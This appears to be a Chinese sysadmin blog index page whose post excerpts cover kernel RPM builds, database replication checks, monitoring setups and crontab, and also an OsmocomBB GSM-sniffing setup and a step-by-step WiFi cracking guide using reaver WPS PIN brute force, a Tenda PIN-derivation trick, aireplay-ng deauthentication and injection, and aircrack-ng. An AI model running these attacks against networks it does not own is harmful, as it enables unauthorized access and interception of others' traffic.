LSX-blog

Feed Rss

下载内核包

1
https://www.kernel.org/pub/linux/kernel/v3.x/linux-3.16.7.tar.gz

安装依赖包

1
yum install gcc rpm-build redhat-rpm-config ncurses-devel patchutils bc xmlto asciidoc elfutils-libelf-devel zlib-devel binutils-devel newt-devel python-devel perl-ExtUtils-Embed hmaccalc kernel-firmware -y

解压内核压缩包

1
tar zxvf linux-3.16.7.tar.gz

复制本机内核配置到新内核目录

1
2
cd linux-3.16.7
cp /boot/config-2.6.32-504.8.1.el6.x86_64 .config

增加内核安装后默认启动

1
2
cd linux-3.16.7
vim scripts/package/mkspec

在%post最后面增加如下行

1
echo "/sbin/grubby --set-default 0"

在%post段后面添加%preun段

1
2
3
echo "%preun"
echo "new-kernel-pkg --rminitrd --rmmoddep --remove $KERNELRELEASE"
echo ""

简单设置config

1
make menuconfig

General setup —> Local version – append to kernel release
输入
.el6.x86_64
保存
创建RPM包
make rpm-pkg

等待完成
~/rpmbuild/RPMS/x86_64 即可看到。

在./ccch_scan 执行过程中出现如下错误:
255error

frameerror

了解更多

开头:

注意:本文章并不是做GSM 嗅探必须的,平时我们刷机叫软刷是刷到内存里面的,断电就消失了,这个是硬刷,刷到flash里面的,断电不消失,开机就运行的。
本文章经过作者实测可行,这只是单个应用程序,官方还有多个应用程序菜单

这篇教程解释了怎样把应用程序刷到C118手机里面。你一定要仔细的阅读每一个细节,否则你的手机可能会变砖。即使你遵循本教程,您可能也会变砖,如果你遇到电缆问题,弱电池或软件故障,目前firmare还不支持电池充电功能。

总共需要三部分:
  1. 原bootloader,第一次刷我就把这个清空了,直接成砖了
  2. osmocom loader,这个是osmocom的loader
  3. 应用程序,这个可以是rssi,layer1 如果没有bootloader,手机就成砖了
内存布局:
  • 0x000000-0x00ffff: Flash page 0
  • 0x010000-0x01ffff: Flash page 1
  • … more Flash pages …
  • 0x800000-0x83ffff: Ram

了解更多

本文大部分是按照官方的步骤直接经过试验并总结的 http://bb.osmocom.org/trac/wiki/Software/GettingStarted

必备的条件

  • 简单的英文阅读能力
  • linux环境 最好是apt-get 包管理方式的(像KaliUbuntuDebian、ArchLinux)在虚拟机中运行和物理机都没有关系,推荐ubuntu 12.04 X64位,记得使用64位,这样你可以使用我编译好的精简包,就可以不用下面的长时间编译了。
  • 交叉编译环境(具体是什么可以问度娘)
  • 手机C118 或者 C139
  • CP2102模块一个
  • 耳机插头一个

    安装相关环境

    一、安装依赖包

    1
    
    sudo apt-get -y install libtool shtool autoconf git-core pkg-config make gcc

    二、安装libosmocore源码包

     

    1
    2
    3
    4
    5
    6
    7
    8
    9
    
    $ cd /opt
    $ git clone git://git.osmocom.org/libosmocore.git
    $ cd libosmocore/ 
    $ autoreconf -i 
    $ ./configure 
    $ make 
    $ sudo make install
    $ ldconfig
    $ cd ..

    了解更多

最近由于一系列安全问题,无意中看到GSM Sniffer的内容,最近也尝试了一把,在这里面最关键的就是更改这个RX 过滤器的事情,没有点专业工具,真是搞不下来,最近又是淘宝,又是电子城的跑,终于花了近500大洋把所有的东西,都买齐了,做这个事呢,不是为了什么,只是喜欢而已。

主要工具:

     热风拆焊台

     小电钻

芯片:

     HHM1526

     HHM1523C1

     04025A150JAT2A

     04025A220JAT2A

辅助器材:

     台灯

     放大镜

     助焊剂

     洗板水

     台钳

学习资料:

     看一下热风枪如何使用

     看一下官方文档

开始

    第一步,把手机的的主板拆下来,拆成下面图片的这种样子,这个是用小电钻把那个屏蔽罩已经去下来的图片

1

了解更多

1

了解更多

最近一直在用find mtime这个参数,搞的很头晕,上网找资料看明白了,过几天又忘记了,特此收录一下别人画的图:
SpxImage5-1024x106

官方参照

       http://www.percona.com/doc/percona-toolkit/2.2/pt-table-checksum.html

介绍

       pt-table-checksum是一个Percona的一个小工具,主要可以用于 主从迁移前后的数据检查

是否一致,或者主从复制出现问题,需要确定那些表不一致.

环境

      master:192.168.0.156—–slave:192.168.0.154

      校验数据库:X25

准备工作

1、登陆Slave库 执行如下SQL      

1
2
3
GRANT SELECT, PROCESS, SUPER, REPLICATION SLAVE \
ON *.* TO 'checksums'@'192.168.0.%' IDENTIFIED BY 'checksums';
flush privileges;

2、登陆Master库 创建数据库及表

1
2
3
4
5
6
7
8
9
CREATE DATABASE percona CHARACTER SET utf8;
CREATE TABLE `dsns` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) DEFAULT NULL,
  `dsn` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
);
INSERT INTO dsns (parent_id,dsn) \
values (1,'h=192.168.0.154,u=checksums,p=checksums');

3、在Master 服务器执行

1
2
3
./pt-table-checksum --user='root' --password='password' \
--databases='x25' --recursion-method dsn=h=localhost,D=percona,t=dsns \
--no-check-binlog-format --no-check-replication-filters

故障:

外网网卡物理状态正常,但无法通信,重起网卡恢复正常

原因:

百度了解到,此问题是由于网卡驱动问题所致,DEL服务器的技术支持正式目前该网卡在Redhat 5.3、5.4、5.5以及Centos 5.3、5.4、5.5的旧的驱动存在bug,Broadcom Corporation NetXtreme II BCM5709 Gigabit Ethernet在负载高的情况下会出现无故中断,重启网卡正常。

解决:

CentOS 5.5 64bit下的网卡驱动升级

升级步骤:

1、查看现有驱动版本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[lishixin@wuweizi ~]$ /sbin/modinfo bnx2
filename: /lib/modules/2.6.18-128.1.6.el5/kernel/drivers/net/bnx2.ko
version: 1.7.9-1
license: GPL
description: Broadcom NetXtreme II BCM5706/5708/5709 Driver
author: Michael Chan <mchan@broadcom.com>
srcversion: 71574E8CA8E4B7882A0AC73
alias: pci:v000014E4d0000163Csv*sd*bc*sc*i*
alias: pci:v000014E4d0000163Bsv*sd*bc*sc*i*
alias: pci:v000014E4d0000163Asv*sd*bc*sc*i*
alias: pci:v000014E4d00001639sv*sd*bc*sc*i*
alias: pci:v000014E4d000016ACsv*sd*bc*sc*i*
alias: pci:v000014E4d000016AAsv*sd*bc*sc*i*
alias: pci:v000014E4d000016AAsv0000103Csd00003102bc*sc*i*
alias: pci:v000014E4d0000164Csv*sd*bc*sc*i*
alias: pci:v000014E4d0000164Asv*sd*bc*sc*i*
alias: pci:v000014E4d0000164Asv0000103Csd00003106bc*sc*i*
alias: pci:v000014E4d0000164Asv0000103Csd00003101bc*sc*i*
depends:
vermagic: 2.6.18-128.1.6.el5 SMP mod_unload gcc-4.1
parm: disable_msi:Disable Message Signaled Interrupt (MSI) (int)

2、进入下载页http://zh-cn.broadcom.com/support/ethernet_nic/netxtremeii.php

filename:linux-7.6.62.zip

了解更多

http://os.51cto.com/art/201307/402207.htm

已发表于51CTO

kickstart是什么
许多系统管理员宁愿使用自动化的安装方法来安装红帽企业 Linux.为了满足这种需要,红帽创建了kickstart安装方法.使用kickstart,系统管理员可以创建一个文件,这个文件包含了在典型的安 装过程中所遇 到的问题的答案.
Kickstart文件可以存放于单一的服务器上,在安装过程中被独立的机器所读取.这个安装方法可以支持使用单一kickstart文件在多台机器上安 装红帽企业Linux,这对于网络和系统管理员来说是个理想的选择.
Kickstart给用户提供了一种自动化安装红帽企业Linux的方法.
如何执行kickstart安装
kickstart 安装可以使用本地光盘,本地硬盘驱动器,或通过 NFS,FTP,HTTP 来执行.
要使用 kickstart,必须:
1.创建一个kickstart文件.
2.创建有kickstart文件的引导介质或者使这个文件在网络上可用.
3.筹备安装树.
4.开始kickstart安装.
创建kickstart文件
kickstart文件是一个简单的文本文件,它包含了一个项目列表,每个项目由一个关键字来识别.可以用「Kickstart 配置」应用程序创建它或是自己从头编写.红帽企业Linux安装程序也根据在安装过程中的选择创建一个简单的kickstart文件,这个文件被写入到 /root/anaconda-ks.cfg.可以用任何能够把文件保存为ASCII文本的文本编辑器或字处理器来编辑它.
首先,在创建kickstart文件时留意下列问题:
1.每节必须按顺序指定.除非特别申明,每节内的项目则不必按序排列.小节的顺序为:
命令部分,这里应该包括必需的选项.
%packages部分,这部分选择需要安装的软件包.
%pre和%post部分,这两个部分可以按任何顺序排列而且不是必需的.
2.不必需的项目可以被省略.
3.如果忽略任何必需的项目,安装程序会提示用户输入相关的项目的选择,就象用户在典型的安装过程中所遇到的一样.一旦用户进行了选择,安装会以非交互的 方式(unattended)继续(除非找到另外一个没有指定的项目).

了解更多

一、打开监听模式

airmon-ng start wlan0

二、抓取要破解的MAC

airodump-ng mon0

二、开始破解决

reaver -i mon0 -b 1C:FA:68:DE:01:14 -N -S -a -c 11 -vv -s /root/1CFA68DE0114.wpc

参数解释

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, –interface=<wlan> Name of the monitor-mode interface to use
-b, –bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, –mac=<mac> MAC of the host system
-e, –essid=<ssid> ESSID of the target AP
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, –out-file=<file> Send output to a log file [stdout]
-s, –session=<file> Restore a previous session file
-C, –exec=<command> Execute the supplied command upon successful pin recovery
-D, –daemonize Daemonize reaver
-a, –auto Auto detect the best advanced options for the target AP
-f, –fixed Disable channel hopping
-5, –5ghz Use 5GHz 802.11 channels
-v, –verbose Display non-critical warnings (-vv for more)
-q, –quiet Only display critical messages
-h, –help Show help

Advanced Options:
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, –delay=<seconds> Set the delay between pin attempts [1]
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, –max-attempts=<num> Quit after num pin attempts
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, –timeout=<seconds> Set the receive timeout period [5]
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, –no-associate Do not associate with the AP (association must be done by another application)
-N, –no-nacks Do not send NACK messages when out of order packets are received
-S, –dh-small Use small DH keys to improve crack speed
-L, –ignore-locks Ignore locked state reported by the target AP
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, –nack Target AP always sends a NACK [Auto]
-w, –win7 Mimic a Windows 7 registrar [False]

注意如果你的路由器腾达的,并且腾达路由前6位MAC地址是C83A35或者00B00C

那么可以直接由软件计算得出PIN。打开系统自带的计算器,把计算器设置成科学型(在查看里设置),先选择十六进制,然后输入腾达路由器mac地址的后六位,再点十进制,出来的数就是腾达路由的前七位pin码,PIN的时候最后一位可以从0开始,到9才一个一个的试总共10个码,就出来PIN码了。

 

Aireplay-ng 的 6 种攻击模式详解

-0 Deautenticate 冲突模式

使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。

如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。

aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0 参数说明:

【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)

【-a】:设置 ap 的 mac

【-c】:设置已连接的合法客户端的 mac。

如果不设置-c,则断开所有和 ap 连接的合法客户端。

aireplay-ng -3 -b <ap mac> -h <my mac> wifi0

注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

-1 fakeauth count 伪装客户端连接

这种模式是伪装一个客户端和 AP 进行连接。

这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让 AP 接受数据包,必须使自己的网卡和 AP 关联。如果没有关联的话,目标 AP 将忽略所有从你网卡发送的数据包,IVS 数据将不会产生。

用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生 ARP 包。

aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0

参数说明:

【-1】:伪装客户端连接模式,后面跟延时

【-e】:设置 ap 的 essid

【-a】:设置 ap 的 mac

【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)

-2 Interactive 交互模式

这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式

1.这种模式主要用于研究学习无客户端,先用-1 建立虚假客户端连接然后直接发包攻击 ,

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0

参数说明:

【-2】:交互攻击模式

【-p】:设置控制帧中包含的信息(16 进制),默认采用 0841

【-c】:设置目标 mac 地址

【-b】:设置 ap 的 mac 地址

【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)

2.提取包,发送注入数据包 aireplay-ng -2 –r <file> -x 1024 wifi0 发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择 1024。

-3 ARP-request 注入攻击模式

这种模式是一种抓包后分析重发的过程 这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和 ap 之间通信,少量数据就可产生有效 ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到 ARP request.,则这种攻击就会失败。

如果合法客户端和ap之间长时间内没有 ARP request,可以尝试同时使用-0 攻击. 如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生有效 ARP request。再通过-3 模式注入。

aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0

参数说明:

【-3】:arp 注入攻击模式

【-b】:设置 ap 的 mac

【-h】:设置

【-x】:定义每秒发送数据户包的数量,但是最高不超过 1024,建议使用 512(也可不定义)

-4 Chopchop 攻击模式

用以获得一个包含密钥数据的 xor 文件 这种模式主要是获得一个可利用包含密钥数据的 xor 文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。

aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 参数说明:

【-b】:设置需要研究学习的 AP 的 mac

【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)

-5 fragment 碎片包攻击模式

用以获得 PRGA(包含密钥的后缀为 xor 的文件) 这种模式主要是获得一个可利用 PRGA,这里的 PRGA 并不是 wep key 数据,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包,当 AP 重广播时,一个新的 IVS 将产生,我们就是利用这个来研究学习 !

aireplay-ng -5 -b <ap mac> -h <my mac> wifi0

【-5】:碎片包攻击模式

【-b】:设置 ap 的 mac

【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)

Packetforge-ng:数据包制造程序 Packetforge-ng <mode> <options>Mode

【-0】:伪造 ARP 包

packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp

参数说明:

【-0】:伪装 arp 数据包

【-a】:设置 ap 的 mac

【-h】设置虚拟伪装连接的 mac(即自己的 mac)

【-k】<ip[:port]>说明:设置目标文件 IP 和端口

【-l】<ip[:port]>说明:设置源文件 IP 和端口

【-y】<file>说明:从 xor 文件中读取 PRGA。后面跟 xor 的文件名。

【-w】设置伪装的 arp 包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 研究学习主程序

Aircrack-ng [optin] <.cap/.ivs file>Optin aircrack-ng -n 64 -b <ap mac> name-01.ivs )

参数说明:

【-n】:设置 WEP KEY 长度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap

参数说明:

【-x】:设置为暴力研究学习模式

【-f】:设置复杂程度,wep 密码设置为 1,wpa 密码设置为 2 aircrack-ng -w password.txt ciw.cap

【-w】:设置为字典研究学习模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。

1、查看无线网卡
iwconfig
2、开启mon模式
airmon-ng start wlan0
3、Kill网卡占用进程
kill pid1 pid2
4、查看要抓包的AP
airodump-ng mon0
5、抓包
airodump-ng -w wep-01 -c 3 –bssid 54:04:A6:8B:8E:4C mon0
wep-01是要保存的文件名
3 是第三通道
MAC 是AP 的MAC 地址
mon0 是处于mon模式的网卡号
6、根据情况执行注入
6.1、在有客户端的情况下进行注入
aireplay-ng -3 -b AP MAC -h ClientMAC mon0
6.2、无客户端的情况下
aireplay-ng -1 0 -a AP’s MAC -h My MAC mon0 建立虚拟连接
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0 进行注入
7、当Data数据包上万的时候开始破解
aircrack-ng wep-01.ivs
wep-01.ivs 是抓包保存的文件名
8、等待破解OK

频繁的文件访问会导致系统的Cache使用量大增

$ free –m

total used free shared buffers cached

Mem: 3955 3926 28 0 55 3459

-/+ buffers/cache: 411 3544

Swap: 5726 0 5726

free内存减少到几十兆,系统运行缓慢

运行sync将dirty的内容写回硬盘

$sync

了解更多

通过查看Nginx的并发连接,我们可以更清楚的知道网站的负载情况。Nginx并发查看有两种方法(之所以这么说,是因为笔者只知道两种),一种是通过web界面,一种是通过命令,web查看要比命令查看显示的结果精确一些。下面介绍这两种查看方法

No1、通过浏览器查看

通过web界面查看时Nginx需要开启status模块,也就是安装Nginx时加上

–with-http_stub_status_module

然后配置Nginx.conf,在server点里面加入如下内容

location /nginx_status { stub_status on;allow 192.168.1.100; deny all; }

配置完后重新启动Nginx后

我们可以通过浏览器访问http://localhost/status 查看,如下样式

 

Active connections:1 server accepts handled requests 8 8 500 Reading:0 Writing:1 Waiting:0

了解更多

GAUGE类型

GAUGE翻译过来是计量器的意思。可以理解为最终图表上显示的数据就是采集来的第一手数据。比如气温,停车场中空车位的数目,这种数据随时间变化,并且可上可下,没有固定的规律。

COUNTER类型

COUNTER是计数器的意思。这种类型一般用于记录连续增长的数据,例如某张网卡上流出的数据量。COUNTER数据源会假设计数器的值永远不会减小,除非发生溢出。更新操作会考虑到发生溢出的可能性。计数器会被以每秒的速率存储。当计数器溢出时,RRDtool会检查溢出发生在32bit或是64bit的边界,并对数据加上一个适当的值。

DERIVE类型

DERIVE翻译过来是导出的意思。DERIVE数据类型用于表示本次测量值与最后一次测量值之间的变化,例如单位时间内驶入和驶出停车场的数量。在RRDtool内部,除了没有溢出检查之外,DERIVE和COUNTER的工作原理是完全一致的。

一、先决条件

尽量保证所有表都具有主键或者唯一索引,当然也可部分无伤大雅的表也可以没有,

但要保证表中可以确定出来一条唯一的记录。

二、数据库准备阶段

1、环境变量(源和目标都要)

####################################

export PATH

ORACLE_SID=test

ORACLE_BASE=/opt/app/oracle

ORACLE_HOME=$ORACLE_BASE/oracle/product/10.2.0/db_1

PATH=$PATH:$ORACLE_HOME/bin

LD_LIBRARY_PATH=$ORACLE_HOME/lib:/lib:/usr/lib:$LD_LIBRARY_PATH

export ORACLE_SID ORACLE_BASE ORACLE_HOME PATH LD_LIBRARY_PATH

export NLS_LANG=”Simplified Chinese_china”.ZHS16GBK

stty erase ^H

alias sqlplus=’rlwrap sqlplus’

alias rman=’rlwrap rman’

alias ggsci=’rlwrap /opt/app/goldenGate/ggsci’

#####################################

2、需排除的表

#####################################

ST_USER_NAME

TEST

TMP_PROJECT_ID

TMP_TICKET_ID

3、无主键的表

####################################

M_MANAGER_ROLE

M_ROLE_AUTHORITY

####################################

4、需要同步的Schemas

####################################

TC258

PAYCENTRE

####################################

了解更多

linux crontab格式和详细例子
基本格式 :
* * * * * command
分 时 日 月 周 命令
第1列表示分钟1~59 每分钟用*或者 */1表示
第2列表示小时1~23(0表示0点)
第3列表示日期1~31
第4列表示月份1~12
第5列标识号星期0~6(0表示星期天)
第6列要运行的命令
crontab文件的一些例子:
30 21 * * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每晚的21:30重启apache。
45 4 1,10,22 * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每月1、10、22日的4 : 45重启apache。
10 1 * * 6,0 /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每周六、周日的1 : 10重启apache。
0,30 18-23 * * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示在每天18 : 00至23 : 00之间每隔30分钟重启apache。
0 23 * * 6 /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每星期六的11 : 00 pm重启apache。
* */1 * * * /usr/local/etc/rc.d/lighttpd restart
每一小时重启apache

 

了解更多

Cacti Nagios Nconf 监控报警一体化安装向导

目录

Cacti Nagios Nconf 监控报警一体化安装向导… 1

一、 准备工作… 3

1. 一台新安装的Linux服务器… 3

2. 设置好相应的主机名及IP地址… 3

3. 相应的程序安装包,建议从官方网站下载… 4

4. 调整系统时间… 4

二、 安装LNMP环境… 4

1. 这里我使用我自己汇总的一键安装包… 4

2. 关闭不必要启动的服务… 4

3. 查看端口是否开放… 4

4. 设置防火墙… 5

5. 用浏览器访问… 5

三、 安装MYSQL管理器… 5

1. 安装phpmyadmin. 5

2. 设置nginx配置… 5

3. 设置phpmyadmin. 6

4. 设置MYSQL密码… 6

5. 测试访问… 6

四、 安装NET-SNMP. 7

1. 安装… 7

2. 配置… 7

3. 测试… 8

五、 安装Cacti 8

1. 安装cacti 8

2. 安装spine. 8

3. 配置cacti 8

4. 配置nginx. 9

5. 访问… 10

6. 配置cacti 12

六、 安装Nagios. 13

1. 安装naigos. 13

2. 安装nagios-plugins. 13

3. 配置Nginx. 14

4. 测试… 15

5. 安装CGI 管理器… 15

6. 配置Nginx. 15

7. 测试… 17

七、 整合Catci Nagios. 18

1. 安装Ndoutils. 18

2. 配置Ndoutils. 19

3. 启动… 20

4. 安装NPC. 20

5. 修改内核参数… 21

6. 测试… 22

八、 Nconf的安装与配置… 22

1. 准备工作… 22

2. 安装Nconf. 22

3. 配置Nginx. 22

4. 配置Nconf. 23

5. 配置NConf自动部署… 25

九、 综合测试… 27

一、准备工作

1. 一台新安装的Linux服务器

clip_image002[4]

2. 设置好相应的主机名及IP地址

主机名:CNN

了解更多